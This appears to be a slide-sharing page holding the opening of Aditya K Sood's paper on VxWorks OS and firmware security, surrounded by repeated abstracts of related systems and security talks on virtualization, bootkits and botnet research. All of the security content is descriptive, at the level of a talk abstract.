The document discusses security issues related to the VxWorks operating system and firmware. It provides an overview of the VxWorks architecture and fault management system. It then analyzes vulnerabilities in the VxWorks OS security model, network stack, debugging interface, and firmware configuration. Finally, it discusses threats facing embedded devices like weak security practices.
Implementing SR-IOv failover for Windows guests during live migrationYan Vugenfirer
Presentation from KVM Forum 2020.
In the past, there were several attempted to enable live migration for VMs that are using SR-IOV NICs. We are going to discuss the recent development based on the SR-IOV failover feature in virtio specification and its implementation for the Windows guests. In this session, Annie Li and Yan Vugenfirer will provide an overview of the failover feature and discuss specifics of the Windows guest implementation.
High Performance Storage Devices in the Linux KernelKernel TLV
Agenda:
In this talk we will present the Linux kernel storage layers and dive into blk-mq, a scalable, parallel block layer for high performance block devices, and how it is used to unleash the performance of NVMe, flash and beyond.
Speaker:
Evgeny Budilovsky, Kernel Developer at E8 Storage
https://www.linkedin.com/company/e8-storage
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...The Linux Foundation
This presentation covers a real-world case study of Bitdefender Hypervisor Introspection (HVI) that is based on Xen Project software. On April 14th, The Shadow Brokers released the Eternalblue exploit toolkit, which exploited an SMBv1 vulnerability across a wide range of Windows operating systems. The exploit was most famously used as a propagation mechanism for the WannaCryransomware. HVI prevented exploitation attempts with no prior knowledge of the exploit or underlying vulnerability. This talk will cover the exploit mechanism, how HVI detects its actions, and illustrate some of the advantages of HVI built through open source collaboration. Audience members will takeaway a better understanding of this type of exploit and how something like hypervisor introspection and security through a hypervisor approach can help companies avoid these types of new exploits.
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...The Linux Foundation
Currently XSM is very limited and restrictive in its functionality .
1) one single big policy controlling all domains,
2) reloading new policy requires host reboot.
3) multiple domains performing similar functions to be grouped under same security label and type.
Anshul Makkar, is going to present a talk to discuss about the ongoing work to overcome the above limitations. Some of the security aspect that he will cover
Some of the security features that I will cover.
1) Interdomain communication
2) Creating secure stub domains.
3) Securing and segregating introspection domains.
[CB21] Appearances are deceiving: Novel offensive techniques in Windows 10/11...CODE BLUE
In 2017, Microsoft announced the ARM version of Windows.
The number of devices with ARM version of Windows is increasing, such as Surface Pro X series and HP ENVY x2, and it is gradually becoming popular.
When using these ARM devices, there is a compatibility issue that existing x86/x64 applications cannot be used.
However, this problem has been addressed by providing x86/x64 emulation capabilities.
In recent years, ARM64EC has been announced, allowing for the gradual migration of x64 applications to ARM.
The aggressive introduction of these compatibility technologies is a sign of Microsoft's strong will to promote the ARM version of Windows.
On the other hand, doesn't the introduction of new compatibility technologies provide a new avenue of attack for attackers?
As far as we know, this point has not even been discussed much at this point.
Therefore, we reverse engineered the compatibility technology that exists in Windows on ARM and examined its exploitability.
We found that various techniques are available, such as code injection by modifying XTA cache files, and obfuscation by exploiting newly introduced relocation entries.
All of these techniques have in common the characteristic that the binary "appearance" and runtime behavior are different, making them difficult to detect and track.
In addition, some of the techniques can be widely exploited to interfere with static analysis or sandbox analysis.
Therefore, there is a high possibility that they will become a threat to the ARM version of Windows in the future.
In this presentation, we will explain the details of our new method and its features with demonstrations.
We hope that this presentation will be a good opportunity to develop and promote the security research of Windows on ARM.
The PoC code and detailed reverse engineering results will be available on GitHub.
Implementing SR-IOv failover for Windows guests during live migrationYan Vugenfirer
Presentation from KVM Forum 2020.
In the past, there were several attempted to enable live migration for VMs that are using SR-IOV NICs. We are going to discuss the recent development based on the SR-IOV failover feature in virtio specification and its implementation for the Windows guests. In this session, Annie Li and Yan Vugenfirer will provide an overview of the failover feature and discuss specifics of the Windows guest implementation.
High Performance Storage Devices in the Linux KernelKernel TLV
Agenda:
In this talk we will present the Linux kernel storage layers and dive into blk-mq, a scalable, parallel block layer for high performance block devices, and how it is used to unleash the performance of NVMe, flash and beyond.
Speaker:
Evgeny Budilovsky, Kernel Developer at E8 Storage
https://www.linkedin.com/company/e8-storage
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...The Linux Foundation
This presentation covers a real-world case study of Bitdefender Hypervisor Introspection (HVI) that is based on Xen Project software. On April 14th, The Shadow Brokers released the Eternalblue exploit toolkit, which exploited an SMBv1 vulnerability across a wide range of Windows operating systems. The exploit was most famously used as a propagation mechanism for the WannaCryransomware. HVI prevented exploitation attempts with no prior knowledge of the exploit or underlying vulnerability. This talk will cover the exploit mechanism, how HVI detects its actions, and illustrate some of the advantages of HVI built through open source collaboration. Audience members will takeaway a better understanding of this type of exploit and how something like hypervisor introspection and security through a hypervisor approach can help companies avoid these types of new exploits.
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...The Linux Foundation
Currently XSM is very limited and restrictive in its functionality .
1) one single big policy controlling all domains,
2) reloading new policy requires host reboot.
3) multiple domains performing similar functions to be grouped under same security label and type.
Anshul Makkar, is going to present a talk to discuss about the ongoing work to overcome the above limitations. Some of the security aspect that he will cover
Some of the security features that I will cover.
1) Interdomain communication
2) Creating secure stub domains.
3) Securing and segregating introspection domains.
[CB21] Appearances are deceiving: Novel offensive techniques in Windows 10/11...CODE BLUE
In 2017, Microsoft announced the ARM version of Windows.
The number of devices with ARM version of Windows is increasing, such as Surface Pro X series and HP ENVY x2, and it is gradually becoming popular.
When using these ARM devices, there is a compatibility issue that existing x86/x64 applications cannot be used.
However, this problem has been addressed by providing x86/x64 emulation capabilities.
In recent years, ARM64EC has been announced, allowing for the gradual migration of x64 applications to ARM.
The aggressive introduction of these compatibility technologies is a sign of Microsoft's strong will to promote the ARM version of Windows.
On the other hand, doesn't the introduction of new compatibility technologies provide a new avenue of attack for attackers?
As far as we know, this point has not even been discussed much at this point.
Therefore, we reverse engineered the compatibility technology that exists in Windows on ARM and examined its exploitability.
We found that various techniques are available, such as code injection by modifying XTA cache files, and obfuscation by exploiting newly introduced relocation entries.
All of these techniques have in common the characteristic that the binary "appearance" and runtime behavior are different, making them difficult to detect and track.
In addition, some of the techniques can be widely exploited to interfere with static analysis or sandbox analysis.
Therefore, there is a high possibility that they will become a threat to the ARM version of Windows in the future.
In this presentation, we will explain the details of our new method and its features with demonstrations.
We hope that this presentation will be a good opportunity to develop and promote the security research of Windows on ARM.
The PoC code and detailed reverse engineering results will be available on GitHub.
XPDS16: A Paravirtualized Interface for Socket Syscalls - Dimitri Stiliadis, ...The Linux Foundation
Docker and other container runtimes are gathering momentum and becoming the new industry standard for server applications. Linux namespaces, commonly used to run Docker apps, come with a large surface of attack which is difficult to reduce. Intel’s Clear Containers use KVM to run containers as VMs to provide additional isolation. It is possible to provide VM-like isolation for containers without sacrificing performance.
This talk focuses on the benefits of using Xen to provide an execution environment for Docker apps. The presentation starts by listing the requirements of this environment. It explains why monitoring container syscalls is important and what its security benefits are. The talk introduces a new paravirtualized protocol to virtualize IP sockets and provides the design and implementation details. The presentation clarifies the impact of the new protocol from a security perspective. The discussion concludes by comparing performance figures with the traditional PV network frontend and backend drivers in Linux, explaining the reasons for any performance gaps.
In this talk Liran will discuss interrupt management in Linux, effective handling, how to defer work using tasklets, workqueues and timers. We'll learn how to handle interrupts in userspace and talk about the performance and latency aspects of each method as well as look at some examples from the kernel source.
Liran is the CTO at Mabel technology and co-founder of DiscoverSDK - Software Libraries directory and DiscoverCloud - Business Apps directory.
More than 20 years of training experience including courses in: Linux, Android, Real-time and Embedded systems, and many more.
The lecture by Norman Feske for Summer Systems School'12.
Genode Compositions
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
Bootkit threats have always been a powerful weapon in the hands of cybercriminals, allowing them to establish persistent and stealthy presence in their victims' systems. The most recent notable spike in bootkit infections was associated with attacks on 64-bit versions of the Microsoft Windows platform, which restrict the loading of unsigned kernel-mode drivers. However, these bootkits aren't effective against UEFI-based platforms. So, are UEFI-based machines immune against bootkit threats (or would they be)?
The aim of this presentation is to show how bootkit threats have evolved over time and what we should expect in the near future. Firstly, we will summarize what we've learned about the bootkits seen in the wild targeting the Microsoft Windows platform: from TDL4 and Rovnix (which was used by the Carberp banking trojan) up to Gapz (which employs one of the stealthiest bootkit infection techniques seen so far). We will review their infection approaches and the methods they have employed to evade detection and removal from the system.
Secondly, we will look at the security of the increasingly popular UEFI platform from the point of view of the bootkit author, as UEFI is becoming a target of choice for researchers in offensive security, and proof-of-concept bootkits targeting Windows 8 OS using UEFI have already been released. We will focus on various attack vectors against UEFI and discuss available tools and what measures should be taken to mitigate against them.
The lecture by Norman Feske for Summer Systems School'12.
Genode Architecture
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
Kernel Recipes 2015: How to choose a kernel to ship with a productAnne Nicolas
It’s often difficult to select a kernel for products that are shipped to customers. Several branches exist, bugs need to be avoided as much as possible and updates must be rare enough not to upset customers. All this must be true during all the product’s lifecycle. This presentation will show how the quality of stable kernels evolves over time and when it’s best to pick them and how to help improve them.
Willy Tarreau, HAProxy Technologies
The lecture by Norman Feske for Summer Systems School'12.
Genode Components
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
A talk presented at the Automotive Grade Linux All-Members meeting on September 8, 2015. The focus on why AGL should adopt systemd, and highlights two of the more difficult integration issues that may arise while doing so. The embedded SVG image, courtesy Marko Hoyer of ADIT, is at http://she-devel.com/2015-07-23_amm_demo.svg
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...The Linux Foundation
This presentation will detail a practical approach to memory introspection of virtual machines running on the Xen hypervisor with no in-guest footprint. The functionality makes use of the mem-event API with a number of improvements which enable the proper tracking of guest OS activity. The technology created on top of this Xen API opens the door for several immediate applications, including: rootkit detection and prevention, detection and action on several categories of malware, and event source information for low-level post-event forensics and correlation based on real event data during events.
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelThe Linux Foundation
In era of cloud computing, security is becoming more and more critical for customers. In existing HW/SW architecture hypervisor does not protect tenants against the cloud provider and thus the supplied operating system and hardware. Intel Software Guard Extension (SGX) provides a mechanism that addresses this scenario. It aims at protecting user-level software from attacks from other processes, the operating system, and even physical attackers. Intel SGX makes such protection possible through the use of enclave, which is a protected area in userspace application where the code/data cannot be accessed directly by any software from outside. This presentation intends to give you an introduction of Intel SGX technology, including what it is, how it works, and the existing SW stack to enable SGX for customers, followed by introduction of our work to support SGX virtualization in Xen hypervisor, including the high-level design, current status and future plan.
The ultimate guide to software updates on embedded linux devicesMender.io
Slides from my talk at NDC Techtown 2019.
Abstract:
Software updates has for a long time been a mess, consisting of “homegrown” solutions specific to a certain project and there was very little re-usage between projects and very little collaboration in our community to solve these complex problems. Luckily for us that time is over and the community around this topic has grown over last couple years and still is growing as the demand increases with the growth of IoT and OTA firmware updates (which introduces even more complexity).
There are now well established open-source solutions that have been “battle tested” that we can collaborate on to make the complexity of software updates manageable. We are heading for a time where a quality Board Support Package should provide an software update implementation because it really should be solved at this level instead of handing this over to application developers which have limited knowledge of low lever architecture on a embedded device.
In this talk Mirza will present some of the challenges of doing software updates on embedded system. He will also present the available open-source projects that can be used to solving these challenges. Projects such as mender.io, SWupdate, RAUC and more.
XPDS16: A Paravirtualized Interface for Socket Syscalls - Dimitri Stiliadis, ...The Linux Foundation
Docker and other container runtimes are gathering momentum and becoming the new industry standard for server applications. Linux namespaces, commonly used to run Docker apps, come with a large surface of attack which is difficult to reduce. Intel’s Clear Containers use KVM to run containers as VMs to provide additional isolation. It is possible to provide VM-like isolation for containers without sacrificing performance.
This talk focuses on the benefits of using Xen to provide an execution environment for Docker apps. The presentation starts by listing the requirements of this environment. It explains why monitoring container syscalls is important and what its security benefits are. The talk introduces a new paravirtualized protocol to virtualize IP sockets and provides the design and implementation details. The presentation clarifies the impact of the new protocol from a security perspective. The discussion concludes by comparing performance figures with the traditional PV network frontend and backend drivers in Linux, explaining the reasons for any performance gaps.
In this talk Liran will discuss interrupt management in Linux, effective handling, how to defer work using tasklets, workqueues and timers. We'll learn how to handle interrupts in userspace and talk about the performance and latency aspects of each method as well as look at some examples from the kernel source.
Liran is the CTO at Mabel technology and co-founder of DiscoverSDK - Software Libraries directory and DiscoverCloud - Business Apps directory.
More than 20 years of training experience including courses in: Linux, Android, Real-time and Embedded systems, and many more.
The lecture by Norman Feske for Summer Systems School'12.
Genode Compositions
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
Bootkit threats have always been a powerful weapon in the hands of cybercriminals, allowing them to establish persistent and stealthy presence in their victims' systems. The most recent notable spike in bootkit infections was associated with attacks on 64-bit versions of the Microsoft Windows platform, which restrict the loading of unsigned kernel-mode drivers. However, these bootkits aren't effective against UEFI-based platforms. So, are UEFI-based machines immune against bootkit threats (or would they be)?
The aim of this presentation is to show how bootkit threats have evolved over time and what we should expect in the near future. Firstly, we will summarize what we've learned about the bootkits seen in the wild targeting the Microsoft Windows platform: from TDL4 and Rovnix (which was used by the Carberp banking trojan) up to Gapz (which employs one of the stealthiest bootkit infection techniques seen so far). We will review their infection approaches and the methods they have employed to evade detection and removal from the system.
Secondly, we will look at the security of the increasingly popular UEFI platform from the point of view of the bootkit author, as UEFI is becoming a target of choice for researchers in offensive security, and proof-of-concept bootkits targeting Windows 8 OS using UEFI have already been released. We will focus on various attack vectors against UEFI and discuss available tools and what measures should be taken to mitigate against them.
The lecture by Norman Feske for Summer Systems School'12.
Genode Architecture
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
Kernel Recipes 2015: How to choose a kernel to ship with a productAnne Nicolas
It’s often difficult to select a kernel for products that are shipped to customers. Several branches exist, bugs need to be avoided as much as possible and updates must be rare enough not to upset customers. All this must be true during all the product’s lifecycle. This presentation will show how the quality of stable kernels evolves over time and when it’s best to pick them and how to help improve them.
Willy Tarreau, HAProxy Technologies
The lecture by Norman Feske for Summer Systems School'12.
Genode Components
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
A talk presented at the Automotive Grade Linux All-Members meeting on September 8, 2015. The focus on why AGL should adopt systemd, and highlights two of the more difficult integration issues that may arise while doing so. The embedded SVG image, courtesy Marko Hoyer of ADIT, is at http://she-devel.com/2015-07-23_amm_demo.svg
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...The Linux Foundation
This presentation will detail a practical approach to memory introspection of virtual machines running on the Xen hypervisor with no in-guest footprint. The functionality makes use of the mem-event API with a number of improvements which enable the proper tracking of guest OS activity. The technology created on top of this Xen API opens the door for several immediate applications, including: rootkit detection and prevention, detection and action on several categories of malware, and event source information for low-level post-event forensics and correlation based on real event data during events.
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelThe Linux Foundation
In era of cloud computing, security is becoming more and more critical for customers. In existing HW/SW architecture hypervisor does not protect tenants against the cloud provider and thus the supplied operating system and hardware. Intel Software Guard Extension (SGX) provides a mechanism that addresses this scenario. It aims at protecting user-level software from attacks from other processes, the operating system, and even physical attackers. Intel SGX makes such protection possible through the use of enclave, which is a protected area in userspace application where the code/data cannot be accessed directly by any software from outside. This presentation intends to give you an introduction of Intel SGX technology, including what it is, how it works, and the existing SW stack to enable SGX for customers, followed by introduction of our work to support SGX virtualization in Xen hypervisor, including the high-level design, current status and future plan.
The ultimate guide to software updates on embedded linux devicesMender.io
Slides from my talk at NDC Techtown 2019.
Abstract:
Software updates has for a long time been a mess, consisting of “homegrown” solutions specific to a certain project and there was very little re-usage between projects and very little collaboration in our community to solve these complex problems. Luckily for us that time is over and the community around this topic has grown over last couple years and still is growing as the demand increases with the growth of IoT and OTA firmware updates (which introduces even more complexity).
There are now well established open-source solutions that have been “battle tested” that we can collaborate on to make the complexity of software updates manageable. We are heading for a time where a quality Board Support Package should provide an software update implementation because it really should be solved at this level instead of handing this over to application developers which have limited knowledge of low lever architecture on a embedded device.
In this talk Mirza will present some of the challenges of doing software updates on embedded system. He will also present the available open-source projects that can be used to solving these challenges. Projects such as mender.io, SWupdate, RAUC and more.
This presentation talks about Real Time Operating Systems (RTOS). Starting with fundamental concepts of OS, this presentation deep dives into Embedded, Real Time and related aspects of an OS. Appropriate examples are referred with Linux as a case-study. Ideal for a beginner to build understanding about RTOS.
Virtual Machines Security Internals: Detection and ExploitationMattia Salvi
This paper is an analysis of the current state of virtual machines’ security, showcasing how features have been turned into attack vectors that can pose threats to real enterprise level infrastructures. Despite the few real world scenarios that have actively exploited security holes, they remain one of the most dangerous threats organizations have to look out for.
Customers are using NSX to drive business benefits as show in the figure below. The main themes for NSX deployments are Security, IT automation and Application Continuity.
Figure 3: NSX Use Cases
• Security:
NSX can be used to create a secure infrastructure, which can create a zero-trust security model. Every virtualized workload can be protected with a full stateful firewall engine at a very granular level. Security can be based on constructs such as MAC, IP, ports, vCenter objects and tags, active directory groups, etc. Intelligent dynamic security grouping can drive the security posture within the infrastructure.
NSX can be used in conjunction with 3rd party security vendors such as Palo Alto Networks, Checkpoint, Fortinet, or McAffee to provide a complete DMZ like security solution within a cloud infrastructure.
NSX has been deployed widely to secure virtual desktops to secure some of the most vulnerable workloads, which reside in the data center to prohibit desktop-to-desktop hacking.
• Automation:
VMware NSX provides a full RESTful API to consume networking, security and services, which can be used to drive automation within the infrastructure. IT admins can reduce the tasks and cycles required to provision workloads within the datacenter using NSX.
NSX is integrated out of the box with automation tools such as vRealize automation, which can provide customers with a one-click deployment option for an entire application, which includes the compute, storage, network, security and L4-L7 services.
6
Developers can use NSX with the OpenStack platform. NSX provides a neutron plugin that can be used to deploy applications and topologies via OpenStack
• Application Continuity:
NSX provides a way to easily extend networking and security up to eight vCenters either within or across data center In conjunction with vSphere 6.0 customers can easily vMotion a virtual machine across long distances and NSX will ensure that the network is consistent across the sites and ensure that the firewall rules are consistent. This essentially maintains the same view across sites.
NSX Cross vCenter Networking can help build active – active data centers. Customers are using NSX today with VMware Site Recovery Manager to provide disaster recovery solutions. NSX can extend the network across data centers and even to the cloud to enable seamless networking and security.
Software Defined Everything infrastructure that virtualizes compute, network, and storage resources and delivers it as a service. Rather than by the hardware components of the infrastructure, the management and control of the compute, network, and storage infrastructure are automated by intelligent software that is running on the Lenovo x86 platform.
Control of Communication and Energy Networks Final Project - Service Function...Biagio Botticelli
Final Project of the Control of Communication and Energy Networks course of the Master Degree in Engineering in Computer Science at University of Rome "La Sapienza".
The technical report introduce the concepts of Service Function Chaining (SFC) and Network Function Virtualization (NFV) analyzing an approach to merge the two technologies.
Docker moves very fast, with an edge channel released every month and a stable release every 3 months. Patrick will talk about how Docker introduced Docker EE and a certification program for containers and plugins with Docker CE and EE 17.03 (from March), the announcements from DockerCon (April), and the many new features planned for Docker CE 17.05 in May.
This talk will be about what's new in Docker and what's next on the roadmap
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
1. Digging Inside the VxWorks OS and Firmware
The Holistic Security
Aditya K Sood (0kn0ck)
SecNiche Security Labs (http://www.secniche.org)
Email: adi ks [at] secniche.org
1
3. 1 Acknowledgement
I sincerely thank my friends and security researchers for sharing thoughts over
the VxWorks.
• Jeremy Collake (Bitsum)
• Edgar Barbosa (COSEINC)
• Luciano Natafrancesco (Netifera)
In addition, I would also like to thank HD Moore for finding vulnerabilities in
VxWorks OS. A sincere gratitude to all the researchers who are engaged in con-
structive research for the security community. I am also grateful to Dr. Richard
J Enbody for supporting me in work related to computer security.
Lastly, I sincerely want to thank CIGTIAL Inc. and my security group at
SecNiche Security Labs for supporting me in doing continuous security research.
Nonetheless, all the conference organizers who invited me to deliver talks and
have shown faith in me.
3
4. 2 Abstract
VxWorks is one of the most widely accepted embedded OS. In this paper, we
have conducted a detailed study of the security model of VxWorks OS and
firmware in order to understand the potential impact of security vulnerabilities
on its functioning.
4
5. 3 Introduction
VxWorks is a real-time portable operating system interface developed by Wind
River Systems.VxWorks can be optimized to run under three different configu-
rations. VxWorks has been successfully used in military and civilian avionics,
including Boeing 787, 747-8 and Airbus A400M. It is also used in onground
avionic systems such as civilian and military radar stations. VxWorks also finds
its usage in non-safety-critical applications where performance is at premium.
Linksys wireless routers also rely on VxWorks OS as a part of running firmware.
Basically, different configurations enable the developers to take control of the
application by effective debugging and fault handling mechanisms. VxWorks
has a standard development suite called as Wind River Workbench which is a
JAVA Eclipse platform. This IDE (Integrated Development Environment) is
used as development suite for code compiling, analysis, editing, and debugging.
First, VxWorks can be optimized to run as a closed system having a protec-
tion between processes running in kernel and user mode with effective error
management. Second, VxWorks OS can be optimized to run as a networking
platform having similar functionalities of a network OS such as firewalls and
security protocols. Third, VxWorks can be implemented as a safety critical sys-
tem or hard real-time system that meets the highest levels of safety and security
requirements.
OS security is very critical because it is the base software that supports
different applications. Vulnerabilities present in the operating systems can have
a dramatic impact on the running applications. If a system is compromised by
OS level vulnerabilities such as kernel compromise, an attacker can completely
